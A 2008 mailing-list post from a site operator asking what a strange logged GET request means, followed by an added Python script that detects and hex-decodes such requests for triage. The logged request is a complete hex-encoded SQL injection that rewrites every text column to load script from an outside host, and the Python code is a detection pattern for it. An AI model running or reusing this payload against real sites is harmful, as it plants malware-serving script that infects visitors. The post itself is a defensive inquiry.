
Commands Sent to an FeaReferenceModelOntology

From: Adrian Walker <adriandwalker@gmail.com>
Date: Fri, 15 Aug 2008 13:42:12 -0400
Message-ID: <1e89d6a40808151042s1218466ua66417ad160466fb@mail.gmail.com>
To: semantic_web@googlegroups.com, SW-forum <semantic-web@w3.org>, semanticweb@yahoogroups.com, "[ontolog-forum]" <ontolog-forum@ontolog.cim3.net>

Hi All --

Your expert advice please.

On our website [1], we support a kind of Wiki for business rules and facts,
written in executable English.

The site can also be used as an SOA endpoint.

One of the sets of rules and facts on the site is a version of the
FeaReferenceModelOntology.

We are seeing incoming GET commands like the one listed below.

 [15/Aug/2008:13:10:57 -0400] "GET
/demo_agents/FeaReferenceModelOntology2.agent?;DeCLARE%20@S
%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S);
HTTP/1.1" 200 620290

The commands originate from many different sites around the internet, and we
have not been able to find out why they are being sent.

Does anyone know please what these commands are trying to do?  Or are they
simply buffer overflow attack attempts?

Thanks for your kind thoughts about this, and apologies for cross posting.

                                                   -- Adrian

[1]  Internet Business Logic
A Wiki and SOA Endpoint for Executable Open Vocabulary English over SQL and
RDF
Online at www.reengineeringllc.com    Shared use is free

Adrian Walker
Reengineering
Received on Friday, 15 August 2008 17:42:49 GMT
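
One way to triage requests shaped like the log entry quoted in the message, shown as an added example that is not part of the original post: URL-decode the query string, match the DECLARE / SET ... CAST(0x...) / EXEC wrapper that is visible in the request, and hex-decode the CAST argument so the statement it carries can be read. The function name, the sample path and the sample log lines are constructed for illustration, and the code assumes one complete log entry per line.

```python
import re
from urllib.parse import unquote_plus

# One access-log request field: "METHOD target HTTP/x.y" status
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# The wrapper visible in the logged request once URL-decoded:
#   DECLARE @S CHAR(n); SET @S=CAST(0x<hex> AS CHAR(n)); EXEC(@S)
WRAPPER = re.compile(
    r"declare\s+@(\w+)\s+(?:n?var)?char\(\d+\)\s*;\s*"
    r"set\s+@\1\s*=\s*cast\(\s*0x([0-9a-f]+)\s+as\s+(?:n?var)?char\(\d+\)\s*\)\s*;\s*"
    r"exec\s*\(\s*@\1\s*\)",
    re.IGNORECASE,
)

def inspect(log_line):
    """Return None for a line without the wrapper, else a dict describing the hit."""
    req = REQUEST.search(log_line)
    if not req:
        return None
    path, _, query = req.group(1).partition("?")
    hit = WRAPPER.search(unquote_plus(query))
    if not hit:
        return None
    try:
        # Hex-decode the CAST argument so the hidden statement can be read, never run.
        decoded = bytes.fromhex(hit.group(2)).decode("latin-1")
    except ValueError:  # odd number of hex digits: still a hit, just not decodable
        decoded = None
    return {"path": path, "status": int(req.group(2)), "decoded": decoded}

# Constructed sample lines (not from the original log); the hex is the benign text "SELECT 1".
SAMPLE = [
    '[15/Aug/2008:13:10:57 -0400] "GET /demo_agents/Example.agent?;DeCLARE%20@S%20CHAR(4000);'
    'SET%20@S=CAST(0x53454C4543542031%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 512',
    '[15/Aug/2008:13:11:02 -0400] "GET /demo_agents/Example.agent?name=declare HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(inspect(line))
```

A 200 status only shows that the server answered the request; whether the decoded statement ever reached a database depends on how the application builds its queries.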
